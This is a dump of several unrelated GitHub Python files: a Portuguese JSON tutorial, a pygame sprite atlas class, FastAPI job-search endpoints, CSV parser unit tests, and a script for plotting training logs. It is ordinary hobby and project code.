+{"seq_id": "42307662229", "text": "\"\"\"\nJson é basicamente uma estrutura de dados que foi criada para que você transporte\nou salve dados. \n\"\"\" \n\"\"\"\nDados que podem ter no Json são bolean, number(int ou float), null(nada), string,\narray (\"[]\") são como se fosse uma lista, e por fim um \"{}\" igual aos objetos(dictionary)\n\"\"\"\n\n\n#Exemplo1 de arquivo json :\n\n\"\"\"\n[\n {\"name\": \"Luiz\", \"lasName\": \"Miranda\", \"age\": \"22\"},\n {\"name\": \"Rafael\", \"lasName\": \"Alves\", \"age\": \"15\"},\n {\"name\": \"João\", \"lasName\": \"Henrique\", \"age\": \"16\"},\n {\"name\": \"Billy\", \"lasName\": \"Paul\", \"age\": \"16\"},\n {\"name\": \"Kayo\", \"lasName\": \"Gabriel\", \"age\": \"17\"}\n]\n\n\"\"\"\n\n# Exemplo2 de arquivo json :\n\n# {\n# \"name\": \"Luiz\", \n# \"lasName\": \"Miranda\", \n# \"age\": \"22\",\n# \"adresses\": [\n# {\"line1\": \"av. brasil\"},\n# {\"line2\": \"av. amapá\"}\n# ]\n# }\n\n\n\n\n\n\nimport json\nimport os\n\n\n# pessoas = [\n# {\n# \"nome\": 'maria',\n# \"sobrenome\": 'santos',\n# \"idade\": 25,\n# \"ativo\": False,\n# \"notas\": ['A', 'A+'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# },\n# {\n# \"nome\": 'Joana',\n# \"sobrenome\": 'Moreira',\n# \"idade\": 32,\n# \"ativo\": True,\n# \"notas\": ['B', 'A'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# }, \n# ]\n\n# BASE_DIR = os.path.dirname(__file__) # Criação do caminho completo do arquivo aonde está\n# SAVE_TO = os.path.join(BASE_DIR, 'arquivo-python.json') # Este seria o arquivo\n# # Irá ter o caminho (BASE_DIR) mais o nome do arquivo ^\n\n\n# with open(SAVE_TO, 'w') as file: # File é o nome do arquivo\n# json.dump(pessoas, file, indent=2) # salva o dictionary como json file.\n\n\n# print(json.dumps(pessoas, indent=2))\n\n\n# Carregar de fora para dentro o json___________________________________________________________\n\nBASE_DIR = os.path.dirname(__file__) \nJSON_FILE = os.path.join(BASE_DIR, 'arquivo-python.json') \n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n \n# for pessoa in pessoas:\n# print(pessoa['nome'], pessoa['notas'])\n\n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n# print(json.dumps(pessoas)) # Converte ele em dumps e o printa.\n\n\njson_string = '''\n[{\"nome\": \"maria\", \"sobrenome\": \"santos\", \"idade\": 25, \"ativo\": false, \"notas\": [\"A\", \"A+\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}, {\"nome\": \"Joana\", \"sobrenome\": \"Moreira\", \"idade\": 32, \"ativo\": true, \"notas\": [\"B\", \"A\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}]\n''' # aqui foi usado para pegar a string\n\npessoas = json.loads(json_string) # Carrega as \"pessoas\" em formato de string\n # ele lê isto, entende, e converte em uma lista python.\n\nfor pessoa in pessoas:\n print(pessoa['nome'])\n# faz o for na lista e pega os dados de voltas\n\n\"\"\"\n load = carrega um arquivo.\n dump = joga para fora.\n json.dump = O dump normal, em um arquivo.\n json.dumps = Seria o dump de uma string, fazendo dump em uma string.\n ident = Formata a string\n\"\"\"", "repo_name": "CidineiPuto/aulaDePython", "sub_path": "aula123.py", "file_name": "aula123.py", "file_ext": "py", "file_size_in_byte": 3124, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}]}
+{"seq_id": "40083120995", "text": "import os\nimport copy\nimport pygame\nfrom animation import Animation\nfrom animation import StaticAnimation\nfrom entities.gui.sliced_image import SlicedImage\nimport config\n\n# if rescale is not a factor of 2, sprites will have fuzzy edges that will look terrible with color keying\nassert config.rescale_factor % 2 == 0, \"factor must be a multiple of 2\"\nassert isinstance(config.rescale_factor, int), \"factor must be an int value\"\n\n\nclass SpriteAtlasError(Exception):\n def __init__(self, name):\n super().__init__()\n self.name = name\n\n\nclass SpriteNotFoundError(SpriteAtlasError):\n def __init__(self, sprite_name):\n super().__init__(sprite_name)\n\n\nclass InvalidDimensionsError(SpriteAtlasError):\n def __init__(self, name, rect, wh):\n super().__init__(name)\n self.rect = rect\n self.dimensions = wh\n\n\nclass SpriteAtlas:\n \"\"\"An atlas is a grouped set of surfaces. By itself, it doesn't do much\n more than read the main surface into memory along with a txt file that describes\n the surfaces contained within the atlas. This information can be used to create\n specific Animation instances for later use by calling appropriate methods on the atlas\"\"\"\n def __init__(self, atlas_path=None, tf_use_rescale_factor=True, convert=True):\n # use the descriptor file to load subsurfaces\n self.sprite_rects = {}\n\n if atlas_path is not None and len(atlas_path) > 0:\n # locate atlas descriptor\n basename = os.path.splitext(atlas_path)[0]\n atlas_descriptor = basename + '.txt'\n\n if not os.path.exists(atlas_descriptor) or not os.path.exists(atlas_path):\n raise FileNotFoundError(atlas_descriptor)\n\n self.atlas = pygame.image.load(atlas_path)\n\n if not self.atlas:\n raise FileNotFoundError(atlas_path)\n\n if tf_use_rescale_factor:\n # apply rescaling\n # rescale without resampling\n scaled_size = (self.atlas.get_width() * config.rescale_factor,\n self.atlas.get_height() * config.rescale_factor)\n\n self.atlas = self.atlas \\\n if config.rescale_factor == 1 else pygame.transform.scale(self.atlas, scaled_size)\n\n self.rescale_factor = config.rescale_factor\n else:\n self.rescale_factor = 1\n\n file = open(atlas_descriptor, 'r')\n\n if not file:\n raise FileNotFoundError(atlas_descriptor)\n\n for line in file:\n # of the form: name = left top width height\n name, rect_str = [s.strip() for s in line.split('=')]\n rect = self._get_rect_from_str(rect_str)\n\n # apply rescale factor\n rect.x *= self.rescale_factor\n rect.y *= self.rescale_factor\n rect.width *= self.rescale_factor\n rect.height *= self.rescale_factor\n\n # add sprite to dictionary\n self.sprite_rects[name] = rect\n else:\n self.__sprite_rects = {}\n self.atlas = None\n\n self.animations = {}\n self.statics = {} # statics aren't initialized to anything by default so user can specify color key if wanted\n self.sliced = {}\n\n if convert and self.atlas is not None:\n self.atlas = self.atlas.convert()\n\n @property\n def sprite_names(self):\n return list(self.sprite_rects.keys())\n\n def initialize_animation(self, name, frame_width, frame_height, duration, color_key=None):\n if name in self.animations:\n return self.animations[name]\n\n # grab rect for this name\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n rect = self.sprite_rects[name]\n\n frame_height = frame_height or frame_width\n\n if rect.width % frame_width != 0 or rect.height % frame_height != 0:\n raise InvalidDimensionsError(name, rect, (frame_width, frame_height))\n\n frames = [self.atlas.subsurface(\n pygame.Rect(x, y, frame_width, frame_height))\n for y in range(rect.y, rect.y + rect.height, frame_height)\n for x in range(rect.x, rect.x + rect.width, frame_width)]\n\n if color_key is not None:\n # cannot use per-pixel alpha values in this case\n converted = [s.convert() for s in frames]\n frames = converted\n\n for f in frames:\n f.set_colorkey(color_key)\n\n animation = Animation(frames, duration)\n\n self.animations[name] = animation\n\n def initialize_static(self, name, color_key=None, override_width=None, override_height=None):\n rect = self._fetch(name, self.sprite_rects)\n\n if override_width or override_height:\n rect = rect.copy() # don't affect original dimensions\n\n rect.width = override_width or rect.width\n rect.height = override_height or rect.height\n\n assert 0 <= rect.width <= self.atlas.get_width(), \"width out of range\"\n assert 0 <= rect.height <= self.atlas.get_height(), \"height out of range\"\n\n assert 0 <= rect.x <= self.atlas.get_width() - rect.width, \"x position out of range\"\n assert 0 <= rect.y <= self.atlas.get_height() - rect.height, \"y position out of range\"\n\n surf = self.atlas.subsurface(rect)\n\n if color_key is not None:\n surf = surf.convert()\n surf.set_colorkey(color_key)\n\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_static_from_surface(self, name, surf):\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_animation_from_frames(self, name, frames, duration):\n assert len(frames) > 0\n\n self.animations[name] = Animation(frames, duration)\n\n def initialize_slice_from_surface(self, name, surf, dims):\n self.sliced[name] = SlicedImage(surf, dims)\n\n def initialize_slice(self, name, slice_size, color_key=None):\n assert len(slice_size) == 2\n\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n # todo: check for double-initialization?\n\n rect = self.sprite_rects[name]\n slice_img = self.atlas.subsurface(rect)\n\n # this surface must be at LEAST 24 bit or else scaling will fail\n if slice_img.get_bitsize() < 24:\n slice_img = slice_img.convert(24)\n\n if color_key is not None:\n slice_img = slice_img.convert()\n assert slice_img.get_bitsize() >= 24 # just to catch unexpected edge cases\n\n slice_img.set_colorkey(color_key)\n\n self.sliced[name] = SlicedImage(slice_img, slice_size)\n\n def load_static(self, name):\n return copy.copy(self._fetch(name, self.statics))\n\n def load_animation(self, name):\n return copy.copy(self._fetch(name, self.animations))\n\n def load_sliced(self, name):\n return copy.copy(self._fetch(name, self.sliced))\n\n def __add__(self, other):\n assert other is not self, \"adding atlas to itself makes no sense\"\n\n # create a new atlas that combines the two previous atlas\n # in this special case, we want shallow copies because it's likely the two atlases to be added\n # are about to be thrown away\n\n def get_names(an_atlas):\n sprite_names = set()\n\n for li in [an_atlas.sliced, an_atlas.statics, an_atlas.animations, an_atlas.sprite_rects]:\n for key_name in li.keys():\n sprite_names.add(key_name)\n\n return sprite_names\n\n # check for duplicate names and warn if any are found, because it may cause the atlas to choose\n # the wrong sprites\n intersections = get_names(self).intersection(get_names(other))\n\n for inter in intersections:\n print(f\"Warning! Two sprites named '{inter}' \"\n f\"in atlases to be combined; consider renaming one of the sprites\")\n\n new_atlas = SpriteAtlas()\n\n for new_d, our_d, other_d in [(new_atlas.sprite_rects, self.sprite_rects, other.sprite_rects),\n (new_atlas.statics, self.statics, other.statics),\n (new_atlas.animations, self.animations, other.animations),\n (new_atlas.sliced, self.sliced, other.sliced)]:\n new_d.update(our_d)\n new_d.update(other_d)\n\n return new_atlas\n\n def scale(self, new_size):\n if new_size is not tuple:\n new_size = (new_size, new_size)\n\n self.atlas = pygame.transform.scale(self.atlas, new_size)\n\n # modify all sprite rects\n old_rects = self.sprite_rects\n self.sprite_rects = {}\n\n # rather than come up with fancy logic to re-create all the sprites, or just to resize them (since that\n # will result in doubling memory use), just assume this will be an operation that happens before any\n # initializing of sprites and warn if it doesn't\n if len(self.statics) > 0 or len(self.animations) > 0 or len(self.sliced) > 0:\n print(\"Warning! Scaling an atlas will result in all initialized sprites being lost\")\n\n self.statics = {}\n self.animations = {}\n self.sliced = {}\n\n for name, rect in old_rects:\n nr = pygame.Rect(rect.x * new_size[0], rect.y * new_size[1],\n rect.width * new_size[0], rect.height * new_size[1])\n self.sprite_rects[name] = nr\n\n @staticmethod\n def _fetch(name, location):\n name = name.strip()\n\n if name not in location:\n print(\"could not find sprite '{}' in atlas\".format(name))\n raise SpriteNotFoundError(name)\n return location[name]\n\n @staticmethod\n def _get_rect_from_str(rect_str):\n r = pygame.Rect(0, 0, 0, 0)\n\n r.left, r.top, r.width, r.height = [int(x) for x in rect_str.split(' ')]\n\n return r\n", "repo_name": "amrazek/386-super-mario", "sub_path": "assets/sprite_atlas.py", "file_name": "sprite_atlas.py", "file_ext": "py", "file_size_in_byte": 10013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.rescale_factor", "line_number": 10, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 49, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 57, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 58, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 116, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 128, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 153, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 156, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 161, "usage_type": "call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 164, "usage_type": "call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 187, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 190, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 196, "usage_type": "call"}, {"api_name": "pygame.transform.scale", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 254, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 269, "usage_type": "call"}]}
+{"seq_id": "16864835228", "text": "from typing import Any, List\nfrom unittest import result\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom app import schemas\nfrom app import crud\n\nfrom app.api.dependencies import get_db\n\nrouter = APIRouter()\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef refresh_job(\n db: Session = Depends(get_db), \n obj_in = schemas.job_search_service.RefreshJobRequest) -> Any:\n result = crud.job_search_service.refresh_job(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef update_failed(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.UpdateFailRequest) -> Any:\n result = crud.job_search_service.update_failed(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef create_metadata(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.CreateMetaDataRequest) -> Any:\n\n result = crud.job_search_service.create_metadata(db = db, obj_in = obj_in)\n return result", "repo_name": "prd-tai-nguyen/test", "sub_path": "app/api/v1/endpoints/job_search_service.py", "file_name": "job_search_service.py", "file_ext": "py", "file_size_in_byte": 1200, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 18, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 18, "usage_type": "argument"}, {"api_name": "app.schemas.job_search_service", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 20, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.refresh_job", "line_number": 20, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 20, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 21, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 27, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 28, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 27, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 27, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 29, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.update_failed", "line_number": 29, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 29, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 30, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 37, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 36, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 36, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 39, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.create_metadata", "line_number": 39, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 40, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "9804263156", "text": "import csv\nimport unittest\n\nimport parse\n\nclass TestParse(unittest.TestCase):\n FILES = ['data/inputFile1.csv', 'data/inputFile2.csv', 'data/inputFile3.csv']\n\n def test_parse_row(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parse.parse_row(row)\n\n def test_parse_csv(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n parse.parse_csv(csv_file)\n\n def test_idempotent(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parsed = parse.parse_row(row)\n if isinstance(parsed, parse.HourOut):\n out_row = parsed.to_row()\n parsed2 = parse.parse_row(out_row)\n self.assertEqual(parsed, parsed2)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "sean-purcell/oec2020", "sub_path": "parse_test.py", "file_name": "parse_test.py", "file_ext": "py", "file_size_in_byte": 1155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 25, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 28, "usage_type": "call"}, {"api_name": "parse.HourOut", "line_number": 29, "usage_type": "attribute"}, {"api_name": "parse.parse_row", "line_number": 31, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "17129684663", "text": "import numpy as np \r\nimport h5py\r\nimport matplotlib.pyplot as plt \r\nimport argparse\r\nimport pandas as pd \r\nfrom scipy import signal \r\nimport seaborn as sns\r\nfrom IPython.core.debugger import Pdb\r\n\r\nEXPERT_MEAN = 9790.99989735\r\nEXPERT_STD = 1175.06649136\r\n\r\ndef moving_average(inp,window_size):\r\n\tfilt = np.ones((window_size))\r\n\tfilt = filt/len(filt)\r\n\tout = np.convolve(inp, filt, \"same\")\r\n\treturn out\r\n\r\ndef plot_log_file(filename, fields_to_plot, save_dir, use_moving_average, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tplt.figure()\r\n\thandles=[]\r\n\tfor field in fields_to_plot:\r\n\t\tdata = [log[i][field] for i in range(log.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata = moving_average(data, window_size=moving_average_window_size)\r\n\t\ttmp, = plt.plot(data, label=field_names[field])\r\n\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(EXPERT_STD*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_fancy(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean, window_size)\r\n\t\r\n\tstd = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean)\r\n\tplt.fill_between(xrange(mean.shape[0]), [i+j for (i,j) in zip(mean,std)], [i-j for (i,j) in zip(mean,std)], facecolor='b', alpha=0.25)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_fancy.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_mean_with_raw(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean_raw = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean_raw, window_size)\r\n\t\r\n\tstd_raw = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std_raw, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean, color='g')\r\n\tplt.plot(mean_raw, color='g', alpha=0.3)\r\n\tplt.plot(std, color='b')\r\n\tplt.plot(std_raw, color='b', alpha=0.3)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_withRaw.png')\r\n\t# plt.show()\r\n\r\n\r\ndef compare_methods(filename1, filename2, fields_to_plot, save_dir, use_moving_average, use_median_filtering, window_size):\r\n\tf1 = h5py.File(filename1,'r')\r\n\tf2 = h5py.File(filename2,'r')\r\n\tlog1 = f1['log']\r\n\tlog2 = f2['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfor field in fields_to_plot:\r\n\t\tplt.figure()\r\n\t\thandles=[]\r\n\t\tdata1 = [log1[i][field] for i in range(log1.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata1 = moving_average(data1, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata1 = signal.medfilt(data1, window_size)\r\n\t\ttmp, = plt.plot(data1, label=filename1.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tdata2 = [log2[i][field] for i in range(log2.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata2 = moving_average(data2, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata2 = signal.medfilt(data2, window_size)\r\n\t\ttmp, = plt.plot(data2, label=filename2.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tplt.legend(handles=handles)\r\n\t\tplt.grid(True)\r\n\t\tplt.savefig(save_dir+filename1.split('/')[-1][:-3]+'--vs--'+filename2.split('/')[-1][:-3]+'-'+field_names[field]+'.png')\r\n\t\tplt.show()\r\n\r\ndef write_csv(in_filename=None, out_filename=None):\r\n\tf_in = h5py.File(in_filename,'r')\r\n\tlog = f_in['log']\r\n\tf_out = open(out_filename,'w')\r\n\t# field_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"nu\", \"Lambda\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfield_names = [\"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"rloss\", \"racc\", \"rgrad\"]\r\n\t# print fields\r\n\tfor field in field_names:\r\n\t\tf_out.write(field+',')\r\n\tf_out.write('\\n')\r\n\r\n\t# print the log data line by line\r\n\tfor line_num in range(log.shape[0]):\r\n\t\tfor entry in log[line_num]:\r\n\t\t\tf_out.write(str(entry)+',')\r\n\t\tf_out.write('\\n')\r\n\tf_out.close()\r\n\r\n\r\ndef plot_csv(file_name, use_moving_average, moving_average_window_size, plot_all_fields, plot_fields, save_dir, expert_level):\r\n\tdf = pd.read_csv(file_name, sep=',')\r\n\ttitles = list(df)\r\n\tplt.figure()\r\n\thandles = []\r\n\tif plot_all_fields:\r\n\t\tfor i in range(len(titles)):\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\telse:\r\n\t\tfor i in plot_fields:\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(expert_level*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+file_name.split('/')[-1][:-4]+'.png')\r\n\tplt.show()\r\n\r\n\r\nif __name__=='__main__':\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument('--plot_single', action='store_true')\r\n\tparser.add_argument('--plot_fancy', action='store_true')\r\n\tparser.add_argument('--plot_fancy_raw', action='store_true')\r\n\tparser.add_argument('--file_name', type=str, help=\".h5 file path if --plot_single or --write_csv and .csv file path if --plot_csv\")\r\n\tparser.add_argument('--compare', action='store_true')\r\n\tparser.add_argument('--file_name1', type=str, help=\".h5 file path 1 if --compare\")\r\n\tparser.add_argument('--file_name2', type=str, help=\".h5 file path 2 if --compare\")\r\n\tparser.add_argument('--save_dir', type=str, default=\"./\", help=\"directory for saving plots\")\r\n\tparser.add_argument('--use_moving_average', action='store_true')\r\n\tparser.add_argument('--use_median_filtering', action='store_true')\r\n\tparser.add_argument('--moving_average_window_size', type=int, default=3)\r\n\tparser.add_argument('--write_csv', action='store_true')\r\n\tparser.add_argument('--plot_csv', action='store_true')\r\n\tparser.add_argument('--plot_all_fields', action='store_true')\r\n\t#TODO: fix the following line - add separate conditions for different fields\r\n\tparser.add_argument('--expert_level', type=float, default=EXPERT_STD)\r\n\r\n\targs = parser.parse_args()\r\n\tfields_to_plot = [1,3]\r\n\tif args.plot_single:\r\n\t\tplot_log_file(args.file_name, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.compare:\r\n\t\tcompare_methods(filename1=args.file_name1, filename2=args.file_name2, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, window_size=args.moving_average_window_size)\r\n\telif args.write_csv:\r\n\t\tout_filename = args.save_dir+args.file_name.split('/')[-1][:-3]+'.csv'\r\n\t\twrite_csv(args.file_name, out_filename)\r\n\telif args.plot_csv:\r\n\t\tplot_fields = [0,1,-1]\r\n\t\tplot_csv(file_name=args.file_name, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size, plot_all_fields=args.plot_all_fields, plot_fields=plot_fields, save_dir=args.save_dir, expert_level=args.expert_level)\r\n\telif args.plot_fancy:\r\n\t\tplot_log_file_fancy(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.plot_fancy_raw:\r\n\t\tplot_log_file_mean_with_raw(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n", 